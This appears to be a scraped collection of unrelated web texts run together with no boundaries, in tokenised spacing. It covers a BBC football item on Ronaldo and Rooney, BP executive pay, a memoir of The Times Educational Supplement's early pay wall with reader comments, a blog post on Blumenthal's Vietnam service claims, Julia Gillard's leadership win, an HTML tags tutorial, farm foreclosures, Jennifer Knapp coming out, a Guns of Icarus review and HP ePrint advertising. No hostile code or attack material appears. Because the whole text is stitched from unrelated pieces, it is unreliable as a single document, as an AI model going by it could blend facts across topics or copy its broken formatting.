Are you a social and wedding photographer , commercial , wildlife , landscape or fashion photographer ?
You probably cover several categories , so use these as the top level hierarchy of folders .
Your Comments
Please enable JavaScript to view the comments powered by Disqus .
Rooney 's all - round game has been well below his usual standards
Cristiano Ronaldo has defended Wayne Rooney over criticism of his World Cup displays so far and backed his former Manchester United team - mate to improve .
Rooney has been well below his best in England 's disappointing draws with the USA and Algeria .
But Ronaldo said : " Wayne Rooney tried very hard , but he did n't play alone .
" When it 's not coming , when you do n't score a goal or play well , it is always the big players ' fault .
But Wayne is a great player and will do a good job . "
Portugal star Ronaldo played with Rooney at United for five seasons , winning three league titles and the Champions League before leaving to join Real Madrid in 2009 .
606 : DEBATE
To gain his confidence back , Rooney needs us on his side not slating him
Smiller12
But the duo clashed at the 2006 World Cup when Rooney was shown a red card for stamping on Portugal defender Ricardo Carvalho .
Ronaldo urged the referee to send off his United team - mate and was caught on camera winking at team - mates as the dismissed Rooney trudged off the field .
Ronaldo , who is also under pressure to deliver for his country after not scoring competitively since Euro 2008 , admitted he had expected more from England .
" I saw England 's games and I 'm quite surprised they did n't win them , " he said .
England must beat Slovenia on Wednesday to be certain of reaching the second round .
Portugal , who drew 0 - 0 with Ivory Coast in their opening match , face North Korea on Monday .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
LONDON ( Reuters ) -
The chief executive of Europe ’s largest oil company by production , BP Plc , enjoyed a 41 percent rise in total pay in 2009 , even though profits dropped 45 percent .
BP Chief Executive Tony Hayward listens during a news conference in London February 2 , 2010 .
REUTERS / Suzanne Plunkett
Tony Hayward took home 4.01 million pounds ( $ 6.03 million ) in salary , cash bonus and share awards last year , up from 2.85 million pounds in 2008 .
The head of BP ’s remuneration committee , DeAnne Julius , said in the company ’s annual report that the increase was to reward Hayward for boosting operational performance .
BP reported a 4 percent rise in crude production in 2009 , compared with stagnant or lower output at rivals , and the company ’s refineries ramped back up to full production after outages .
BP ’s profit collapse was due to the sharp fall in oil and gas prices compared with record levels seen in 2008 .
BP says its pay plan is structured to ensure that executives are paid based on the underlying profitability of the company and to avoid managers enjoying windfalls simply because oil prices surge .
BP said it also beat the share performance of its peer group , the supermajors Royal Dutch Shell , Total , Exxon Mobil and Chevron .
Hayward ’s pay packet is in line with the $ 6 million that Peter Voser , the CEO of rival Shell , earned in 2009 , though Voser only assumed the top job in July .
In 2008 his predecessor Jeroen van der Veer earned $ 13 million .
Rex Tillerson , the CEO of Exxon , the largest non-government controlled oil company in the world by market capitalization , was paid total compensation worth $ 22.4 million in 2008 .
The CEOs of successful oil explorers often earn much more than their “ big oil ” counterparts .
BP also said it proposed that in future a portion of senior managers ’ annual bonuses should be deferred , echoing a similar move by Shell last month .
( Reporting by Tom Bergin , editing by Will Waterman )
' You really think it 's wise to enter your credit card number ? '
By Sean Coughlan
BBC News
As The Times prepares to charge readers for access to its website , it 's worth remembering we 've been here before - when the internet was new and fangled and the idea of asking people to pay for online content went unquestioned .
The arrival of the pay wall for The Times and Sunday Times online editions is being viewed as a media landmark - if the venture succeeds other newspapers and online content providers could follow suit .
The recent era of free access for all could seem like a quaint anomaly .
But this is n't the first time that Rupert Murdoch 's News International group , which also owns the Sun and News of the World , has tried to charge for an online version of a UK newspaper .
Back in early 1997 , when the internet was held together by string , News International attempted an online pay wall .
Murdoch 's right - hand man came to see a demonstration of this strange contraption - obviously this was faked on the hard drive , because no one trusted a dial - up connection
This long lost , below - the - radar experiment answers some questions about how hard - nosed commercial news companies ended up giving away their content for free .
This digital guinea pig was the Times Educational Supplement ( TES ) , a weekly publication for school teachers , which was then owned by News International .
There was already a website for The Times , but it was going to be another two years before it broke a story with its own separate content .
When the TES website was set up , with its own stories , an archive and discussion forums , there was never any question of giving it away for free .
As editor of this fledgling service , I had a close - up view .
Murdoch 's then right - hand man in London , Les Hinton , came to see a demonstration of this strange contraption .
Obviously this was faked on the hard drive , because no one trusted a dial - up connection .
David Blunkett , then shadow education secretary , was invited to cut the ribbon , and readers were invited to subscribe for this new service , using a hi-tech payment method called sending a cheque in the post .
A letter ... by e-mail !
It 's easy to forget how much has changed so quickly .
In 1997 , the mere fact someone had written to The Times letters page using e-mail was considered a news story in its own right .
The TES landing page in 1998 '... now available on - line "
There were no assumptions about what things should cost on the internet , because few people were buying anything .
What kind of maniac would put their credit card number into this unreliable gadget ?
But it was seen as entirely natural that people should pay for the TES online edition .
And the cheques began to arrive .
Readers began to use the service .
It was like watching some kind of fast - forward evolution as a new audience emerged .
They behaved differently , not just looking for news , but wanting to talk to each other , to get information from other experts and be entertained as well as informed .
They wanted pleasure with a purpose .
Except then a strange thing happened .
Word filtered down from above that there was a new idea in town .
It was called giving it away for nothing .
The digital hippies had arrived , bringing a new dot.com philosophy from Silicon Valley .
These highly - paid new media consultants were telling everyone else to give their words away for free , while charging top rates for their own .
Ink - veined newspaper managers , veterans of circulation wars , started to proselytise the importance of " free " .
Return to sender
For the newly - launched TES website , it meant giving back the money to subscribers , baffling readers by telling them that the service they had agreed to buy no longer wanted their cash .
This was the internet , man .
The internet , version one ... displaying a BBC News page in 1997
There were letters from subscribers complaining that they wanted to pay , because they thought this was plainly a move towards cutting the service .
It might have seemed quite strange at the time , like burning money to save on the heating bills .
But everyone followed the stampede to give away news .
Was this more dot con than dot com ?
" It was an entirely irrational decision .
We were wrong , " says Tim Luckhurst , now professor of journalism at the University of Kent and former editor of the Scotsman .
" It was a huge mistake .
But we were all guilty of believing in the myth , " he says .
But having taught readers to expect online newspapers to be free , he says it 's going to be tough for The Times and Sunday Times to convince them it's now time to pay .
" Very few people expect it to work , but most people in the industry want it to work , " he says .
The papers will have to accept a huge decline in online readership , he says , but could be better served by a small number of paying customers than a large number of free riders .
Leaky bucket
There have been sporadic attempts to re-introduce the idea of paying for online news services , but with mixed results .
Apart from resistance from readers , the internet is a leaky bucket , with so many different pathways for content to be copied and re-distributed .
The New York Times has experimented with charging for parts of its website for more than a decade - and from next year will take the plunge with a flat - rate fee for unlimited use .
And the financial daily , the Wall Street Journal , with its well - heeled , niche market , has succeeded in getting people to pay online .
However a couple of years ago the Irish Times had to dismantle its pay wall for its daily news .
Remaining unconvinced is the Guardian 's editor in chief , Alan Rusbridger , who has said it would be " odd and dangerous " for his paper to withdraw entirely behind a pay wall , " cutting off your journalism from the rest of the world " .
In the UK , the vanguard for charging has been the Financial Times , which allows a limited amount of free material before requiring payment .
Rob Grimshaw , managing director of FT.com , says charging for online services is inevitable , as online advertising is unlikely to deliver sufficient returns .
Polo necks
In the long term , he says not charging will come to be seen as the aberration - and he imagines future business students writing case studies of how publishers were wrong - footed .
While it is still " swimming against the tide " to expect payment , he says it will be recognised soon that " the oddness has been to give it away " .
Will The Times and Sunday Times put the clock back before the new media world first put on its polo neck and fashionable glasses ?
Since then websites such as Facebook , YouTube and Google have found ways of getting other people to produce their content .
A public service broadcaster such as the BBC provides online content through the licence fee , while carrying advertising outside the UK .
But newspapers have struggled to find a way to afford the move into a digital world .
The audiences are there in vast numbers , and new technologies such as the iPad make the content tantalisingly easy to reach .
Rupert Murdoch , with his pound a day plan for The Times and Sunday Times , is going to find out how much a digital newspaper is really worth .
Sean Coughlan is now education correspondent for the BBC .
Below is a selection of your comments .
The best proposal I 've seen for crossing the digital - physical divide is to make the digital side real time , constantly updating , free for everyone .
Then make the physical side of things an edited , highlights package .
Like having a news website free for everyone , but having a weekly magazine composed of all the best bits , printed in high quality , something that people would want to keep .
When e-ink finally becomes cheap , inserting video clips into these weekly items wo n't be difficult .
As for putting up paywalls , I doubt it would work for general news .
If its newsworthy , it will be picked up by the " free sheets " almost instantly , and in terms of a business model you 're cutting 90 % of your advertising revenue for a small gain in subscription income .
This seems like the last gasp attempt of a media tycoon struggling to come to terms with the modern age .
Dylan , London , UK I 've run a website for 3 years , attempting to make money from advertising and struggling to make ends meet , despite superb traffic figures .
We went subscription last month , on a calculation that if 1 in 400 of our readers were willing to pay , we 'd at least start to break even .
So far we are running at about 3 times that level , so whilst we have lost over 99 % of our readers , we are bringing in much more money than advertising used to .
We 've also had a lot of very offensive e mails from former readers !
Richard , Devon Such debates have been ongoing in the gaming communities for years now .
Within the Sims community it is particularly heated with one website aptly named PaysitesMustBeDestroyed actively seeking content that other websites charge for and putting it up for free .
I wonder if such a phenomenon will occur in the newspaper world ?
Sarah , Colchester " In 97 , the mere fact someone had sent a missive into the Times letters page by e-mail was considered a news story in its own right . "
A couple of years out there perhaps ?
Our family was perfectly happy buying things online in 97 and it was amusing how most seemed to think the internet would steal their card number yet happily leave the card when they opened a tab at a restaurant !
While true that not many did use the internet much or at all in 1997 , describing an email to a paper as newsworthy seems a little overdramatic .
James B , Bristol Charging for information ?
How very 20th Century .
The problem with any dinosaur is that they can't accept a solution that involves their own extinction , and so they try ideas like this , despite the predictable failure that lies ahead .
Journalists do not make news , they simply provide a service in transporting it .
In the old days , only they could do it , and that is why they got paid .
But this is the 21st Century and without journalists the news would still get through .
If you have read this , then I just proved my point .
( Alternatively , I think my opinion is worth twenty quid , so please mail me your cheque ) .
Andy , Wiltshire
Too late now chaps , you do n't control the news anymore .
Do you honestly think that people will pay a flat rate when they can use competing websites for free ?
No matter how many newspapers do this it 'll be no good .
Well get our news with or without online print .
Garret Eastwood , Cookstown , Northern Ireland .
Liked this story - a nostalgic trip down memory lane for those of us hacking away during the original dotcom boom .
But it also made me think about why the Times / Sunday Times pay wall will fail - and that 's because it is n't niche , the root of all success online , particularly in our Google - dominated , keyword - orientated world .
I 'm now a bookseller - and I pay an annual subscription for an offline industry magazine , plus access to content / services on - line .
It 's niche .
The financial publications you cite in this article can also get away with payment - they are a niche ( financial information , which is often time - sensitive ) .
Paying for ' general ' news just does n't make sense .
For example , if I do n't like the way the BBC is covering a news story , I 'll just switch to a competitor ( Al Jazeera or Matt Drudge for example ) .
And that 's what online readers of the Times will do .
Unless there 's compelling content * only * available to subscribers ( which The Sun / News of the World might just pull off for additional content of an exclusive scoop ) I just can't see the Times managing that .
Mark Thornton , Abingdon , UK
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Used to be you could wear a medal and say you served in Vietnam , but the times , they are a changing , and records are much easier to fact check .
The New York Times did just that .
When CT Democrat Senate candidate Blumenthal said to a group of veterans that he had Served In Vietnam they found the following :
Blumenthal , a Democrat now running for the United States Senate , never served in Vietnam .
He obtained at least five military deferments from 1965 to 1970 and took repeated steps that enabled him to avoid going to war , according to records .
The deferments allowed Mr. Blumenthal to complete his studies at Harvard ; pursue a graduate fellowship in England ; serve as a special assistant to The Washington Post ’s publisher , Katharine Graham ; and ultimately take a job in the Nixon White House .
In 1970 , with his last deferment in jeopardy , he landed a coveted spot in the Marine Reserve , which virtually guaranteed that he would not be sent to Vietnam .
He joined a unit in Washington that conducted drills and other exercises and focused on local projects , like fixing a campground and organizing a Toys for Tots drive .
Many politicians have faced questions over their decisions during the Vietnam War , and Mr. Blumenthal , who is seeking the seat being vacated by Senator Christopher J. Dodd , is not alone in staying out of the war .
via Candidate ’s Words on Vietnam Service Differ From History – NYTimes.com .
And Now this :
The GOP candidate was REALLY in Vietnam !
Update :
It gets worse for Blumenthal .
Meet his likely Republican challenger , Rob Simmons :
Rob ’s public service career began when he enlisted in the U.S. Army in 1965 as a Private , and spent 19 months in Vietnam where he earned two Bronze Star Medals .
Rob continued his military service in the U.S. Army Reserve as a Military Intelligence Officer , retiring as a Colonel in 2003 with over 37 years of active and reserve service .
Update : Credit where credit is due :
No doubt it pained the NYT to drop a bomb on one of the few surefire Democratic winners this November , but they dropped it anyway .
via Hot Air » Bombshell : Democratic Senate candidate lied about serving in Vietnam ; Update : “ Hit job ” ?.
UPDATE : Blumenthal campaign statement
“ The New York Times story is an outrageous distortion of Dick Blumenthal ’s record of service .
Unlike many of his peers , Dick Blumenthal voluntarily joined the Marine Corps Reserves in 1970 and served for six months in Parris Island , SC and six years in the reserves .
He received no special treatment from anyone .
Dick has a long record of standing up for veterans .
Tomorrow , veterans will be standing up with Dick . ”
via NYT : Blumenthal Misstated Vietnam Service – Real Clear Politics – TIME.com .
Update :
SIMMONS STATEMENT ON BLUMENTHAL SERVICE RECORD REPORT
( MYSTIC ) – Rob Simmons , candidate for U.S. Senate , made the following statement today in reaction to tonight ’s New York Times report on Richard Blumenthal ’s service record :
“ As someone who served , I respect Richard Blumenthal for wearing the uniform , but I am deeply troubled by allegations that he has misrepresented his service .
Too many have sacrificed too much to have their valor stolen in this way .
I hope Mr. Blumenthal steps forward and forthrightly addresses the questions that have arisen about this matter . ”
via Rob Simmons for U.S. Senate » SIMMONS STATEMENT ON BLUMENTHAL SERVICE RECORD REPORT .
Share this : Twitter
Facebook
Reddit
LinkedIn
WhatsApp
Pinterest
In a volatile Android ecosystem where bigger and better phones pop up every week , your Nexus One might be feeling a little obsolete .
Frankly , there 's hardly a better way to cheer it up than by installing an operating system that 's a little more its speed .
In the finest DOSBox tradition , one gentleman recently imbued his Googlephone with Windows 3.11 , by far our favorite 1993 Microsoft OS .
Realizing the futility of getting it to do anything -- ah , memories -- he set about crafting a step - by - step guide for you to do the same .
If you care to give his misery company , you 'll find instructions at our source link ; if not , don your rose - tinted glasses and peep the video after the break .
Julia Gillard has been elected unopposed to the Labor leadership , seizing power in a bloodless Parliament House coup after Prime Minister Kevin Rudd decided not to contest this morning 's leadership ballot .
Ms Gillard will now be sworn in as Australia 's first female Prime Minister .
Emerging from this morning 's meeting , she said she felt " very honoured " and said she would be making a statement shortly .
Treasurer Wayne Swan now steps up as Deputy Prime Minister .
He was also elected unopposed .
A stony - faced Mr Rudd left the meeting in the company of Labor stalwart John Faulkner .
Ms Gillard now has the task of leading a traumatised and divided party to a federal election which could be held in a matter of weeks .
Mr Rudd 's sudden and spectacular downfall makes him the first Labor prime minister to be dumped from office before completing a first term .
The situation came to a head last night after senior factional powerbrokers from the right told Ms Gillard she had enough support to take the leadership .
The powerful Australian Workers Union and Health Services Union also quickly swung their support behind Ms Gillard as Mr Rudd 's support base collapsed .
After hours of crisis meetings last night Mr Rudd emerged just after 10:00 pm AEST to announce that Ms Gillard had challenged him to a ballot and that he would also stand .
For months
Ms Gillard had said that she was not interested in challenging Mr Rudd but as events charged ahead last night it appeared she was left with no choice but to throw her hat in the ring .
As the numbers were crunched it became clearer that Ms Gillard was going to prevail , with supporters on both sides agreeing that she would win .
Mr Rudd 's fall from the top has been swift , as his popularity among voters fell from stratospheric highs to disastrous lows in just a few months .
Voters lost faith in Mr Rudd after a series of bungles and backflips , including the shelving of the emissions trading scheme .
Last night he had vowed to fight to remain in office saying the Australian people had elected him , not the Party 's factional leaders .
Let 's go back to the basics for this one .
Everyone reading this at least knows what HTML is .
I believe that , no matter what experience level someone has , reviewing the foundation can help increase knowledge .
It also helps to hone skills , especially with the constantly evolving technologies that drives the Internet .
There has also been a lot of talk of change with HTML 5 .
Every tag that I mention below is supported in both HTML 4.01 and HTML 5 .
While some of these tags are already widely used ; I would like to challenge some of the ways that we use and think about them .
1 . <!-- -->
Any book you read about programming will tell you that it is good to explain what you are doing .
Why are comments a good idea ?
For that exact reason .
It helps those looking at your code know what is going on .
For HTML , commenting can seem like overkill ; however , it can be used to define sections , and can help keep your code organized and structured .
Labeling the beginning and end of a section really helps with the workflow .
2 . Table Styles - < thead > , < tbody > , and < tfoot >
When I think back to the earlier days of web development , the first thing that comes to my mind is < table > .
I abused this so much .
When using < table > correctly , for tabular data only , it is possible to define styles for column headings , footer rows , and the body .
As boring as it is , it really does feel good to create a well - formatted spreadsheet .
( This is speaking outside of web development . )
Why should we not carry that simple task of formatting into great design ?
Each tag can then be easily styled within the site 's stylesheet .
Just to clarify : these three tags all affect table rows .
Item Qty Sum 7 # 1 3 # 2 4
< thead >
Wrap table rows with < thead ></ thead >.
< tfoot >
Wrap table rows with < tfoot ></ tfoot >.
The < tfoot > rows must also be above < tbody > .
This is so that the footer row is rendered before the remaining data rows .
< tbody >
Wrap table rows with < tbody ></ tbody >.
3 . < optgroup >
Dropdowns are a great way to present data to a user for selection .
They not only are conscious of screen real estate , but are familiar and easy to use .
The great thing is with < optgroup > , it is possible to create categories ( or we could call them headings ) for your options .
Detroit Tigers
Chicago Cubs
Detroit Lions
Chicago Bears
4 . Headings - < h1 >,< h2 >,<h3 > , < h4 > , < h5 > , and < h6 >
I know everyone uses heading tags .
But , to be honest , I do not remember when the last time was that I used < h3 > or lower though .
I have no good reasoning aside from I did n't think about it and used something less semantic , like styling text in a < div > .
My point here is :
Do n't create more work for yourself .
Remember to use all of the heading tags .
5. < fieldset > and < legend >
I like sites that have easy to find information with logically separated elements .
I think it looks sleek .
< fieldset > groups together form elements by drawing a box around them .
It is also possible to add a caption to the form by using < legend > .
6. < label >
This is possibly one of my favorite HTML tags .
The label tag does not do anything for styling .
It adds functionality .
< label > is used to define a label to an input element .
So what 's the big deal ?
When used , the label itself becomes clickable , making the corresponding input field active .
This works for text boxes or radio buttons .
Name :
Male :
Female :
7. < blockquote >
If you are looking to create a dramatic effect to draw attention to a statement or sentence , you can use < blockquote > .
White space is inserted before and after the element , by default .
Margins are also added to offset the contained text from the other content .
This is also a great way to do things such as a traditional block quote .
( I know that was horribly obvious . )
Most times , when I write a tutorial , I take a direct excerpt from another site or source .
I will use < blockquote > to set this apart .
This is what Nettuts + uses for its blockquote styling .
8. < cite >
I do n't want to say that < cite > is related to < blockquote > , but I know that I normally end up using them in conjunction .
</ p>
Think of < cite > when you need to provide a citation for something .
If you are fresh out of college , think of providing the list of your references at the end of your papers .
Remember , in MLA format , book and periodical titles are to be italicized .
" We love beautiful typography , and we appreciate the efforts of designers who come up with great typographic techniques and tools or who just share their knowledge with fellow designers . "
- smashingmagazine.com
9. < dl >
Using lists is a great way to organize information .
Everyone is aware of < ul > , but how often are < ol > and < dl > used ?
Perhaps the reference to " definition list " confuses some beginning coders into thinking that they can only be used when inserting terms and definitions - however , this is not really the case .
Types of Lists
Unordered List ( ul ) Ordered List ( ol ) Definition List ( dl )
What They Do
Unordered List ( ul ) :
A bulleted list
: A bulleted list Ordered List ( ol ) : A numbered list
: A numbered list Definition List ( dl ) : A list with definitions to the elements
Reasons to Use Lists
Consistent styling
Easy to create
Very versatile
Each list type displays information in a valuable way .
I do n't think I need to explain < ul > and < ol > , but let 's take a closer look at the structure of a definition list .
Instead of only declaring a list type ( < ul > or < ol > ) and each list item ( < li > ) , we use < dt > and < dd >. < dt > defines each list item and < dd > describes the above item .
10 . '( and other ASCII characters )
It is proper coding to use HTML ASCII codes when using any symbols .
It 's a bit more work , but it will ensure that the characters are rendered properly , and are not confused by the browser as part of a string or other markup .
Have you ever come across some text on a webpage that did n't look correct ?
Maybe something like this : " I didn # % %!t use HTML to render the apostrophe . "
The above example is forced , but I think it conveys the idea .
The character - sets used in modern computers , HTML , and Internet are all based on ASCII .
- w3schools.com
w3schools.com has a great HTML ASCII reference page for ASCII characters .
I encourage everyone to check it out and memorize a few of the most commonly used characters , like the apostrophe , quotes , ampersand , and the " at sign . "
Thanks so much for reading !
Bruce Drinkman is a successful organic dairy farmer who milks 50 cows with his wife , Mari , near Glenwood City , Wisconsin .
Despite his 34 years of experience , the two - year drop in milk prices and four years of drought have meant no profits or savings .
Last fall they were denied credit from their bank to purchase seeds to plant 55 acres in grains and corn this spring .
To continue farming they cashed in Mari ’s retirement account but the farm was placed into foreclosure around Christmas .
After repeated attempts to refinance the farm with other banks , farm credit services and Farm Service Agency ( a division of the U.S. Department of Agriculture , or USDA ) they were turned down by all , and did not even attempt to obtain bank credit this spring .
Fortunately Bruce was able to obtain credit from a vendor to buy seed , and at the end of April he and Mari filed reorganization bankruptcy , the only means they knew to preserve their farm , home and livelihood .
A recent survey by the Federal Reserve Bank of Chicago indicated that 11 percent of Wisconsin farmers with existing lines of credit may not have credit extended next year ; this is especially significant because of the a 56 percent decline in net farm income in 2009 .
Dairy farmers have received prices far below their costs of production for nearly two years .
With eroding equity , many are in immediate danger of losing their farms .
Farmland is so valuable that local ( but often not locally owned ) banks call in farm loans at the first opportunity , destroying families , communities , and regional economies .
Farms entering foreclosure are listed publicly , further devastating owners while notifying speculators and investors of chances to take advantage of distraught landowners .
Something is askew .
As the number of unemployed nationwide remains around 10 percent and the USDA holds summits on revitalizing rural America , why are experienced , efficient farmers receiving ridiculously low prices for their products , forcing family members to seek scarce off - farm jobs to support them ?
Why are banks and USDA denying them access to credit to continue their operations ?
Are these institutions conspiring to close farming operations in order to give investors the opportunity to purchase their land for a fraction of its worth ?
A posting on Farmland Forecast , read by farmers , agribusinesses , investors and speculators interested in agricultural land , stated that “ Midwestern U.S. farmland provides investors the best opportunity …
Farmland may be [ cheaper ] in other regions of the world , but …may not have the same soil quality , transportation infrastructure , or government that supports property rights . ”
When an elderly couple with no heirs interested in or able to afford the farm decides to sell ; when a younger farmer sells after incurring too much debt from low prices and rising input costs , there ’s probably a corporate investor ready to buy .
The land may be flipped to developers when enough profit can be made or planted in commodity crops ( such as soybeans and corn ) used primarily for livestock feed or ethanol production .
Sadly , many people who would like to engage in farming remain landless but are forced to rent or accept tenuous land use arrangements with no guaranteed long - term security .
Speculators and investors only make matters worse by driving the price of farmland out of their reach , making less land available for the profitable production of fresh , local , and sustainable produce , eggs , milk , grains , and meat .
It appears that the people who depend on their land for survival and provide us with food –farmers , ranchers , fishers and laborers–are more expendable than people sitting behind a desk trading stocks , land , and communities ’ futures .
The solution to this situation is two - fold .
First , restructure the pricing system to be fair and just for people producing or harvesting our food .
Second , require banks that received Troubled Asset Relief Funds ( TARP ) to supply credit to and work with small businesses ( including farms ) in their communities .
Demand this from your government .
Otherwise , when farmers are forced off their land because they can’t profit from their labor or access credit for annual inputs , who will provide us the wonderful bounty of summer–watermelon , sweet corn , BLTs , and strawberries with whipped cream ?
Even the best students realize that there comes a time when they must put down their studies and focus on some fun for a while .
If you find yourself needing a break from your online university experience , why not try a little experiment watching films that won Best Picture at the Oscars and then reading the books on which they were based ?
Below are 20 of the Best Pictures ranging from Gone with the Wind in 1939 to No Country for Old Men in 2007 .
Notes :
This week :
NYC cop arrested for shooting husband
Florida cop kills girlfriend , self
Virginia cop arrested for sexual abuse of child
Tennessee cop arrested for robbing drug dealers
Arkansas cop charged for fatal shooting of unarmed man
Alaska cop gets 99 years for murder
and much more !
PLUS an interview with Al Brosseau about his experience with the Kingston , Ontario , police department and the Ontario police complaints process .
Aside from touring with provocative singer - songwriter Derek Webb and preparing for the release of a new album , Knapp is confirming what some had for years suspected – she 's gay .
In interviews with The Advocate , Reuters , and Christianity Today – all published Tuesday – Knapp spoke openly about her sexuality while making it clear that she is not a pro-gay activist or even a self - described lesbian despite being in an eight - year relationship with a woman .
" I 'm just a normal human being who 's dealing with normal everyday life scenarios , " Knapp told Christianity Today .
" As a Christian , I 'm doing that as best as I can , " she added .
" The heartbreaking thing to me is that we 're all hopelessly deceived if we do n't think that there are people within our churches , within our communities , who want to hold on to the person they love , whatever sex that may be , and hold on to their faith .
It 's a hard notion . "
Though not the first Christian music artist to " come out " as gay , Knapp is arguably the most prominent .
Knapp 's impressive history includes over one million albums sold with her three releases to date – Kansas ( 1998 ) , Lay It Down ( 2000 ) , and The Way I Am ( 2001 ) .
In 1999 , Knapp won her first Dove Award for Best New Artist .
The Kansas - born musician later scored a Grammy nod in 2002 and another Dove nomination in 2003 .
" She 's like a fine cabernet .
She only gets better with age , " commented John Huie of Creative Artists Agency , Knapp 's booking agent .
In September 2002 , however , Knapp decided to leave the music scene over a number of issues – her " crazy " and exhausting schedule , for one – and has for the past seven years been spending time soul searching in Australia as well as travelling throughout Europe .
It was n't until the last year that Knapp picked up a guitar again and came out with a couple of new tracks that led to her return to the United States last July .
After a few sessions in the studio , it became clear to Knapp and her team that it was time to make music again , and so Knapp officially moved back to the States in August together with her partner , whose identity Knapp is adamant about protecting .
Now , the finished product , titled Letting Go , is slated for a May 11 release and will be the first test of her fans ' loyalty given confirmation of her sexuality .
While the decision to " come out " one month before her new album 's release is a risky one , The Advocate said Knapp chose to do so partly because she did n't want people to love her music and then discover that their own values wo n't let them sing along full - throated .
" I think it 's going to be shocking and feel like a betrayal to some people who live their spiritual lives through the music they listen to , " Knapp told the LGBT publication .
Furthermore , the move provides Knapp a chance to be " wholly myself " .
Currently , Knapp is on tour with former Caedmon 's Call member Webb and will be until at least the end of April .
Knapp turned 36 on Monday .
Is Steampunk Just A Skin ?
I recently shared a debate with a friend who argued that a short film called The Anachronism was not Steampunk solely based on the fact that two children discover a mechanical squid washed up on the beach .
I countered that this Jules Verne inspired bit of tech could be nothing other than Steampunk in its truest form to which his rebuttal was that Verne predates Steampunk by a century .
At the crux of the argument was the question of whether or not Steampunk is merely an aesthetic or some sort of new canon unto itself ?
I would argue that it is a term created by Steve Jackson , creator of the GURPS paper and dice system to encapsulate many sources that include everything from Jules Verne to Sir Arthur Conan Doyle to Mary Shelley all the way to the wild west robots of Westworld ( and its iteration the 1998 film starring Will Smith “ Wild Wild West “ ) , Neil Gaiman ’s “ Stardust ” or most of Terry Gilliam ’s catalog .
Lest I digress into a protracted thesis on the etymology of Steampunk , I will retrain my opening to underline the fact that many games have drawn upon the Steampunk aesthetic to hype their wares , but very few ( including Arcanum : Of Steamworks and Magick Obscura , Myst , Rise of Nations : Rise of Legends , and the Thief franchise ) have delivered on their promise to immerse us in its wonders .
Many dip their toe in those waters ( Warcraft , Final Fantasy , Cogs , Glim ) but only in a very superficial way , not in a way that requires the underlying concept of anachronism in order to unfold .
Then we arrive at Guns of Icarus from Muse Games .
Built on the Unity engine that allows 3D gameplay inside a browser , and beloved by indie game developers , Guns of Icarus made its journey to PC gaming from browser - based origins before arriving at Steam as an $ 8 download .
Premise / Promise
The game draws on some of the most beloved iconography of the Steampunk lexicon by positioning the player in the shoes of a swarthy zeppelin pilot hellbent on delivering cargo while warding off vicious Sky Pirates who threaten to pillage , plunder and destroy his vessel .
Gameplay
Gameplay consists of running from one of six gun positions to blast the looters ’ biplanes out of the sky all the while running to and fro to make repairs on damaged engines , rigs , cargo holds and the zeppelin itself .
One level to the next varies only in the number of incoming attackers , increasing the need to manage one ’s position on the ship in order to ensure that nothing gets too far out out control to restore things to their proper balance .
All very promising – a word I may use more than once in the scope of this review .
I must point out that as a free browser game , this is unquestionably a fantastic offering ; challenging and immersive gameplay that consists of managing priorities so as to arrive safely at the drop off location intact while offering rich graphics and audio to boot .
One might assume then , that as a port to the PC , the rich canvas would be embellished , that Campaign modes would mean storylines added , richer , more varied gameplay introduced , graphics capabilities optimized and exploited .
What we get , however , are additional gun choices , some weather patterns , 4 person multi-player mode and some other minor , but ultimately inconsequential additions .
What I would love to have seen is not too much to ask ( and I put it this way in hopes the developers will consider it still in a future update ) might include a backstory , perhaps even a cut scene to give this setting some context and illusion of motive , improved backgrounds : with a wonderful setting like cloud - based naval battles , the opportunity for lush panoramic skies is almost a requirement as opposed to the low resolution pixelated background wallpaper that tears at highest resolution , and variety in enemy models .
These are not even gameplay requests , per se , but expectations for a title that asks us to make the leap from free to eight bucks .
There are five gauges at the bottom right of the HUD display at what level a given section of the ship may require your attention .
Unfortunately the gauges are not labelled and so they are n’t very useful in aiding your strategy .
This is an example for where Steampunk ’s typically fastidious habit of labeling and annotating could easily be added without breaking suspension of disbelief , all the while making the gameplay more engaging .
Similarly , when the opportunity to add new guns to the armory is offered in between stages , there is no description of the various guns ’ capabilities – this information is only displayed during the actual gameplay when the player approaches the weapon .
The game would be far more Steampunkesque if these details were surrendered frequently and at the correct timing , contributing greatly to the feeling that we are in its dimension .
Multi-player mode understandably makes the game more enjoyable , primarily because it is a nightmare to handle both the gunner and maintenance duties alone .
Certainly , switch hitting is part of the challenge , but coordinating with a buddy ups the fun factor .
Using the Steam framework for voice chat offers a provisional enhancement , but it is n’t ideal and with the lack of variety from level to level , makes the party a short one at best .
An Appeal to the Devs
I like your game , do n’t get me wrong .
It was fun for a round or two .
But I really wanted to love it .
So here are some suggestions for the update I hope you will release for the PC version ( because as a purchasable title , this feels underdeveloped )
Please add variety to the objectives in the campaigns , even just for some minor variation
Please add labels to the gauges in the HUD
Please let us see weapon info at the point at which we are deciding what weapons to add
Please make the skies worth looking at
Please make the enemy models interesting and various , create fictional factions , give them names , alter their specs for strategic variation
Please add some narrative and full of mystery and intrigue because that is at the heart of a good Steampunk adventure
Please consider some other interesting spec upgrades for a job well done ( purchaseable with money earned from delivering cargo ) – weapon stabilizers , increased ship armor , alchemical enhancements , etc .
The fact of the matter is these are not problems with the fundamental gameplay which Guns of Icarus has managed to pull off , but rather the opportunities that have been missed by invoking the promise of the Steampunk universe to which we want to be transported and could be so easily implemented .
Otherwise this is just a three - dimensional version of Space Invaders or Burger Time .
It is n’t the value or the eight bucks I am concerned with , it ’s the lost opportunity to take a good game and make it really good , possibly even great .
Guns of Icarus is available on the iTunes App Store and Steam .
Rating :
Hewlett - Packard plans to use Yahoo's advertising network in a pilot program that will deliver targeted advertisements for content printed with its latest line of Web - connected printers .
HP launched a line of Web - connected printers last week that allow users to print content directly from the Web or send content from their mobile phone to a remote printer using an e-mail address specific to that printer .
HP also launched a program called " scheduled delivery , " where a user can regularly schedule printing , for example , portions of a daily newspaper every day at 7 a.m .
The company also sees a potential for localized , targeted advertising to go along with the content .
While testing its ePrint Web - connected printers , HP ran two trials where consumers received content from a U.S. national music magazine and major U.S. newspaper along with advertisements , said Stephen Nigro , senior vice president in HP 's Imaging and Printing Group .
" What we discovered is that people were not bothered by it [ an advertisement ] , " Nigro said .
" Part of it I think our belief is you 're used to it .
You 're used to seeing things with ads . "
HP 's ePrint printers , some of which will become available next month , are connected to the user 's home router , which means they will have an IP address .
